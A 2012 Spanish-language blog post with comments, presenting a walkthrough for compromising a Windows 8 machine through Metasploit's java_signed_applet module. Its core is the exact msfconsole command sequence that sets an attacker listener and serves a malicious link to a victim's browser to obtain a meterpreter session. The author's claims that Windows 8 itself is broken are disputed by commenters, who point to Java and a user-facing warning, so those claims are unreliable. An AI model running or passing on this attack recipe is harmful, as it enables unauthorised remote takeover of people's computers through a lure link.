martes, 30 de octubre de 2012

Explotando Windows 8 desde Metasploit




Segun Wikipedia: Windows 8 es la versión actual del sistema operativo de Microsoft Windows, producido por Microsoft para su uso en computadoras personales, incluidas computadoras de escritorio en casa y de negocios, computadoras portátiles, netbooks, tabletas, servidores y centros multimedia. Añade soporte para microprocesadores ARM, además de los microprocesadores tradicionales x86 de Intel y AMD. Su interfaz de usuario ha sido modificada para hacerla más adecuada para su uso con pantallas táctiles, además de los tradicionales ratón y teclado.

Segun Yo: La seguridad que ofrece Microsoft en esta nueva version de Windows, es la misma que se obtiene al instalar Windows 7, esto se debe a que efectivamente solo ha cambiado la interfaz grafica y ha añadido nuevos programas que lo hace mas vulnerable, simplemente por ser una version parecida a los que usan los Telefonos Moviles. La actualizacion automatica que brinda, solo sirve para actualizar el Internet Explorer y los servicios (Redes Sociales - Correo y Multimedia). El Windows Defender que se integra por default, no detecta las URL maliciosas (Exploits Kit's) ni mucho menos cuando se intenta descargar algun archivo ejecutable, solamente se pronuncia el aviso que brindan los navegadores "Desea descargar este Archivo (Permitir - Rechazar)" que es lo unico que al menos nos alerta de un supuesto Malware, por lo que simplemente Windows 8 seria el WINDOWS XP 2012.


Llegando a la conclusion y opinion personal sobre Windows 8, decide realizar las pruebas respectivas para comprobar realmente y estar 100% seguro de lo mencionado lineas arriba. Para tal caso me base en la vulnerabilidad que se puede aprovechar en todos los navegadores, la cual consiste en ejecutar cualquier URL que genera el Metasploit para poder penetrar un Windows actualizado y parcheado.

El procedimiento que realize para comprometer la seguridad de Windows 8 son los siguientes:


REQUERIMIENTOS:

Backtrack 5 R1 - R2 o R3 (Atacante)
Metasploit Framework (Atacante)
Windows 8 (Victima)
Google Chorme, Firefox o IE (Victima)


PROCEDIMIENTO DEL ATAQUE:

Abrimos Metasploit (msfconsole) y ejecutamos los siguientes comandos:

------------------------------------------------------------------------------------------------------------------
use exploit/multi/browser/java_signed_applet (Modulo Java para diferentes navegadores)
set lhost 192.168.1.17 (IP del Atacante) 
set lport 80 (Puerto)
set uripath / (Path del link a enviar)
exploit
------------------------------------------------------------------------------------------------------------------



Despues de ejecutar los comandos mencionados, MSF generara una URL (http://192.168.1.17:8080) que sera enviada a la victima con Windows 8, esta contendra un archivo (.exe) que se autoejecutara al momento de abrirlo en cualquier navegador web, ya sea en Internet Explorer 10 (version que integra Windows 8) Google Chorme, Opera o Firefox.

He aqui un ejemplo de la session meterpreter que se crea al momento de ejecutar la URL generada por Metasploit:




Esto quiere decir que hemos VULNERADO el Windows 8 con una simple URL, seguidamente ejecutaremos los comandos correspondientes para obtener la informacion del sistema.



Las pruebas fueron realizadas en el Sistema Operativo Windows 8 con el Firewall, Windows Defender, Actualizaciones Automaticas, Internet Explorer 10 (modo seguro) respectivamente ACTIVADO.

Si desean realizar sus propias Pruebas de Seguridad, pueden descargar el Windows 8 e instalarlo en una Maquina Virtual, recomendable usar el VMWARE, los .iso se encuentran disponibles desde los siguientes link's:

Saludos.

15 comentarios:

  1. ▒▐█▀▀ █▀▄ ▀ ▄▀
    ▒▐█▀▀ █░█ █ █░
    ▒▐█▄▄ █▀░ ▀ ░▀

    ▒█░░░▄░░▒█ ▀ █▄░█
    ▒█░░▒█░░▒█ █ █░▀█
    ░▒▀▄▀▒▀▄▀░ ▀ ▀░░▀

    ResponderEliminar
  2. Hey TioSam una pregunta , ese java , ya fue parchado , creo que afecta a la version 6.9 o algo asi ... yo en mi caso (creo un troyano.exe) y lo mando a la victima mas facil . .espero que hagas un video asi :D

    ResponderEliminar
  3. exelente informacion,.. gracias por ponerlo !!!,... Gracias ehhh! salu2 , y buen POst!

    ResponderEliminar
  4. Exelente casi nunca pongo en practica por falta de tiempo pero siempre me pongo a leer todos tus post en tu blog Calebbucker, eres de lo maximo te considero un profesiónal.

    saludos y muy buena vibra !

    By Nomo11

    ResponderEliminar
  5. Sin ofender, pero creo que esto es falso, si no creo que un simple bloquero pueda hackear windows 8 y que esta informacion no haya sido dofundida en ninguna ota pagina, jejejeej, no me lo creo.

    ResponderEliminar
    Respuestas
    1. Hola 'Anonimo',

      Quisiera saber si ya optaste por realizar las Pruebas de Seguridad entre el BackTrack y el Windows 8, al parecer la respuesta es un NO.

      Espero te documentes mas antes de escribir sin fundamentos.

      Un saludo.

      Eliminar
  6. Eres un poco sensacionalista, ¿no crees?

    El fallo es de java no de windows 8.

    Ademas al usuario se le mostrara una alerta de que esta ejecutando un applet firmado por una fuente no confiable, o no?

    ResponderEliminar
    Respuestas
    1. Hola,

      Vos pensas que para 'explotar' un sistema Windows, se opta por enviar exploits derivados para el sistema o para los programas dentro de ello?

      Antes de decir algo, uno debe de escribir con fundamentos.

      un saludo.

      Eliminar
    2. Al título me remito: "Explotando Windows 8 desde Metasploit"

      Explotando Windows 8?? En ningún momento explotas Windows 8. Consigues ejecutar código en un Windows 8 mediante ingeniería social con un applet (auto)firmado.

      Así puedes explotar un Windows, Linux, MacOS o lo que quieras...

      Eliminar
    3. Hola,

      Si, el mismo titulo lo indica "Explotando Windows 8 desde Metasploit", no indica "Explotando Windows 8 desde un Troyano o Java Generator desde Windows" que al parecer vos pensas que es desde otro windows, entonces por logica no se ve la explotacion, simplemente veras como el envio de un troyano.

      Al parecer no has leído el post completo, te recomiendo que lo observes, claramente indico los procedimientos y el método de explotación.

      En el procedimiento se crea un backdoor para aprovechar la vulnerabilidad del Java, que en este caso Windows 8 lo integra en su Internet Explorer 10, y al momento que abrir el link generado por el MSF, esta se ejecuta AUTOMÁTICAMENTE, por lo que el sistema queda totalmente vulnerado con un simple LINK.

      Aparte, las pruebas se realizaron con todos las "defensas" que ofrece Windows 8, cosa que si ejecutarías un troyano, esta no se ejecutara.

      Y como te vuelvo a repetir, los Sistemas Operativos se explotan mediante los programas o servicios vulnerables desde el MSF.

      Te recomiendo que realizes tus propias pruebas, para que notes la diferencia entre explotar un sistema desde el MSF y hacerlo mediante un troyanito que al parecer vos usas eso.

      Un saludo.

      Eliminar
  7. Buenas!

    Consulta, este procedimiento afectara por igual a un Win7?, osea si se basa en una vulnerabilidad de java se debería poder no? o es solo para una x version que usa en especifico win 8?

    Thank you!

    ResponderEliminar
  8. Mi Buen Caleb Bucker Hay perosonas que nadamas se dedican a cuestionar a los demas ya que se sienten sobrepasados en nivel intelectual como es el caso del "Anonimo" Nivel de IQ---> 80 o menos xD... A mi en lo personal es muy buena la informacion que das Ya que yo tambien soy Pentester (w1ck3dpl46u3) y la verdad Tienes muy buenos tutos para personas a las que realmente les agrada y les motiva el mundo informatico, Espero Sigas Posteeando Nuevos logro y nuevas vulnerabilidades... Hasta Pronto

    ResponderEliminar
  9. calerbuker, no se si la version de x64 de windows 8 ya la parcharon o si es el navegador, pero cuando lanzo el exploit, en la parte superior del navegador sale un aviso que dice que windows defender detecto un malware.

    aunque lo probe hace algun tiempo y funciona bien......tienes un excelente blog...te felicito, espero algun dia poder tener el mio con tanta info

    ResponderEliminar
  10. Hola,lo he probado con e Kaly Linux, y la victima con un windows 8 Pro con java 1.7.0_25 y con Internet Explorer 10 y funciona te felicito sigue así.

    ResponderEliminar
  11. hola, soy nuevo en esto y estoy realizando pruebas en mi red local, sin usar una maquina virtual, te comento que he realizado todos los pasos pero se queda en server started, en que falle?

    ResponderEliminar